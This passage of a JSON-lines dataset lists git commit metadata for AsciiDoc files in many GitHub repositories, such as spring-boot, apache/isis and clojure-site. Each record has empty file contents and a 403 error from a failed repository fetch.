document\n","repos":"tiarebalbi\/spring-boot,jxblum\/spring-boot,htynkn\/spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,royclarkson\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,bclozel\/spring-boot,ilayaperumalg\/spring-boot,zhanhb\/spring-boot,htynkn\/spring-boot,mdeinum\/spring-boot,habuma\/spring-boot,vakninr\/spring-boot,linead\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,ptahchiev\/spring-boot,olivergierke\/spring-boot,vakninr\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,isopov\/spring-boot,vpavic\/spring-boot,zhanhb\/spring-boot,mdeinum\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,chrylis\/spring-boot,mosoft521\/spring-boot,hello2009chen\/spring-boot,eddumelendez\/spring-boot,pvorb\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,eddumelendez\/spring-boot,bbrouwer\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,linead\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,ptahchiev\/spring-boot,ihoneymon\/spring-boot,ptahchiev\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,lburgazzoli\/spring-boot,tiarebalbi\/spring-boot,olivergierke\/spring-boot,vakninr\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,kdvolder\/spring-boot,spring-projects\/spring-boot,felipeg48\/spring-boot,ilayaperumalg\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,Buzzardo\/spring-boot,vpavic\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,pvorb\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,bclozel\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,mdeinum\/spring-boot,ptahchiev\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,yangdd1205\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,rweisleder\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,habuma\/spring-boot,NetoDevel\/spring-boot,bjornlindstrom\/spring-boot,dreis2211\/spring-boot,mbenson\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,habuma\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,olivergierke\/spring-boot,donhuvy\/spring-boot,tsachev\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,bjornlindstrom\/spring-boot,scottfrederick\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,NetoDevel
\/spring-boot,michael-simons\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,olivergierke\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,spring-projects\/spring-boot,hello2009chen\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,pvorb\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot,isopov\/spring-boot,htynkn\/spring-boot,vakninr\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,vakninr\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,zhanhb\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,bbrouwer\/spring-boot,joshiste\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,bbrouwer\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,tsachev\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,shakuzen\/spring-boot,bbrouwer\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,yangdd1205\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,bjornlindstrom\/spring-boot,bbrouwer\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot","old_file":"SUPPORT.adoc","new_file":"SUPPORT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5355b23bdbbf77ec67df4b4e4c8edeee0e230b9","subject":" ISIS-1819 add @Parent to annotation ref. guide","message":" ISIS-1819 add @Parent to annotation ref. 
guide","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgant\/_rgant-Parent.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgant\/_rgant-Parent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9ce99de740960a04dcc6698eec80e2861fc7942","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a0c78a1891e30a24004619476250050af3b4ec3","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62b26a12eeaddb70e4a5b7dabad11a59de6f3a36","subject":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","message":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50af665559bd375d4f3cb39a190ea68cd3c61281","subject":"URL fix","message":"URL fix\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"186639af40df5f693dac2cbe031c581640e1cc70","subject":"darken image","message":"darken image\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"pages\/download.adoc","new_file":"pages\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20f70d9177420f9231f62f315c2a42566c499155","subject":"doc\/pages: Add command-parsing.asciidoc to describe command line parsing","message":"doc\/pages: Add command-parsing.asciidoc to describe command line parsing\n","repos":"Somasis\/kakoune,Somasis\/kakoune,mawww\/kakoune,casimir\/kakoune,jkonecny12\/kakoune,jkonecny12\/kakoune,lenormf\/kakoune,occivink\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,mawww\/kakoune,mawww\/kakoune,casimir\/kakoune,lenormf\/kakoune,casimir\/kakoune,Somasis\/kakoune,jjthrash\/kakoune,lenormf\/kakoune,danr\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,danr\/kakoune,jkonecny12\/kakoune,danr\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,casimir\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,Somasis\/kakoune,occivink\/kakoune,occivink\/kakoune,danr\/kakoune,lenormf\/kakoune","old_file":"doc\/pages\/command-parsing.asciidoc","new_file":"doc\/pages\/command-parsing.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjthrash\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"be47aa077239239011fd0d497e1181b4afa3bce6","subject":"Update 2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","message":"Update 2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"381f5914f4482eba7efaf0e5dbd5f37b68aadbd6","subject":"Update 2017-04-12-Royal-amp-Select-Master-Degrees.adoc","message":"Update 2017-04-12-Royal-amp-Select-Master-Degrees.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-04-12-Royal-amp-Select-Master-Degrees.adoc","new_file":"_posts\/2017-04-12-Royal-amp-Select-Master-Degrees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f851678bc0114e44aaad7987cb9258fe37bd971","subject":"Add README","message":"Add README\n","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"riff-cli\/README.adoc","new_file":"riff-cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"12ebe77e4ae5abc137680029178a7e953de20ca4","subject":"docs: hide encodefunctionCall","message":"docs: hide encodefunctionCall","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30738c97e1b3344c26b3f5966f9942cf6ed7f4d6","subject":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","message":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"702efaff9bb43acc05f342105f227201af470b08","subject":"Update 2015-08-15-Ola-Mundo.adoc","message":"Update 2015-08-15-Ola-Mundo.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-15-Ola-Mundo.adoc","new_file":"_posts\/2015-08-15-Ola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31184709a2748ff40ad13969805669afafadce91","subject":"Update 2016-03-15-namespace.adoc","message":"Update 2016-03-15-namespace.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-15-namespace.adoc","new_file":"_posts\/2016-03-15-namespace.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba583842b2f12d0beb9ba73aa4e0d6cd44e98dee","subject":"Update 2016-06-11-Hong-Kong.adoc","message":"Update 2016-06-11-Hong-Kong.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-11-Hong-Kong.adoc","new_file":"_posts\/2016-06-11-Hong-Kong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"477f44d29e70f082e546f94a4fac616e22743393","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d115ffb730f87f4634d7bfe2fc63d0580c6d35c5","subject":"Update 2015-08-10-Github.adoc","message":"Update 2015-08-10-Github.adoc","repos":"LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Rackcore\/Rackcore.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Rackcore\/Rackcore.github.io","old_file":"_posts\/2015-08-10-Github.adoc","new_file":"_posts\/2015-08-10-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db7b4bd19daadc2c1cc33c3ccc06f7b7e3436ea4","subject":"Update 2016-10-24-Now-Prove-It.adoc","message":"Update 2016-10-24-Now-Prove-It.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-24-Now-Prove-It.adoc","new_file":"_posts\/2016-10-24-Now-Prove-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f8299af9baea9be1ce6d60b211ecae774d7c1d4","subject":"Update 2016-03-13-C-multithreading.adoc","message":"Update 2016-03-13-C-multithreading.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-13-C-multithreading.adoc","new_file":"_posts\/2016-03-13-C-multithreading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8af127d5a1298985c60b672d4e4a85555cd5642b","subject":"Update 2016-04-06-Rompiendo-sistemas.adoc","message":"Update 2016-04-06-Rompiendo-sistemas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c18a741081f86e9acf7a442e299f213ed084c2","subject":"Add common-dependencyMicronautHttpClient.adoc","message":"Add 
common-dependencyMicronautHttpClient.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-dependencyMicronautHttpClient.adoc","new_file":"src\/main\/docs\/common-dependencyMicronautHttpClient.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"987ad236138f2aafd491fb689de44285ea005074","subject":"Create README.adoc","message":"Create README.adoc","repos":"aparnachaudhary\/dockerfiles","old_file":"wildfly-dc\/README.adoc","new_file":"wildfly-dc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/dockerfiles.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb401831df5b5ea5c5796d00e873fc383ad37c3b","subject":"Update 2016-03-02-Hubpress.adoc","message":"Update 2016-03-02-Hubpress.adoc","repos":"YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io","old_file":"_posts\/2016-03-02-Hubpress.adoc","new_file":"_posts\/2016-03-02-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YJSoft\/yjsoft.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7537aa5124e4f6d74820449311e50da6ade10f16","subject":"Add generic authorization page","message":"Add generic authorization page\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/features\/authorization\/index.adoc","new_file":"docs\/modules\/ROOT\/pages\/features\/authorization\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db61d320117f96555d679921ebdd65c20261650a","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc35ff974ebc7cfc78f6deb21df716da6ebf7bf7","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cea081bdc76da3df8d8e7ac0ac732f63bca931e1","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88bd708387bd1b9acaa4b02f72c7aed5e34a11fe","subject":"y2b create post BLACK FRIDAY \\\/ CYBER MONDAY DEALS 2013!","message":"y2b create post BLACK FRIDAY \\\/ CYBER MONDAY DEALS 2013!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-28-BLACK-FRIDAY--CYBER-MONDAY-DEALS-2013.adoc","new_file":"_posts\/2013-11-28-BLACK-FRIDAY--CYBER-MONDAY-DEALS-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7acf83576d3008d31a8fc7e329a8a4632bb2d4d9","subject":"Publish DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","message":"Publish DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","new_file":"DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d0a5bd40f7162219086fba60a81a2391a67dd2e","subject":"Add section on admission policies (#322)","message":"Add section on admission policies (#322)\n\n* Add section on admission policies\r\n\r\nKubernetes admission policies are those enforced when new\r\nresources are created, updated, or deleted.\r\nThis tutorial describes admission control and how to impose\r\norganization-specific policies at admission-time, using\r\nthe OpenPolicyAgent.\r\n\r\n* Fix pod apiVersion key name\r\n\r\n* Address comments\r\n\r\n* More fixes\r\n\r\n* A front-to-back editing pass\r\n\r\n* Address comments from Chris\r\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"admission-policy\/readme.adoc","new_file":"admission-policy\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"ab6f93fa935b7a39aa1572d03b3fdfd35f856521","subject":"port Creating Tickets page from wiki","message":"port Creating Tickets page from wiki\n","repos":"clojure\/clojure-site","old_file":"content\/community\/creating_tickets.adoc","new_file":"content\/community\/creating_tickets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"14a7931fc294c610a7dced81f9ef33bbad39415d","subject":"y2b create post The Smallest, Fastest Storage EVER?","message":"y2b create post The Smallest, Fastest Storage EVER?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-08-The-Smallest-Fastest-Storage-EVER.adoc","new_file":"_posts\/2016-02-08-The-Smallest-Fastest-Storage-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d739932e3b0c92f09bc67fc832dc26ac41b1c0c","subject":"Adds ClojureBridge Buenos Aires","message":"Adds ClojureBridge Buenos Aires\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurebridge-ba.adoc","new_file":"content\/events\/2017\/clojurebridge-ba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5379f4cc6ab5a160b595a0d418f4cbc03e318493","subject":"adds index document for categorized features","message":"adds index document for categorized 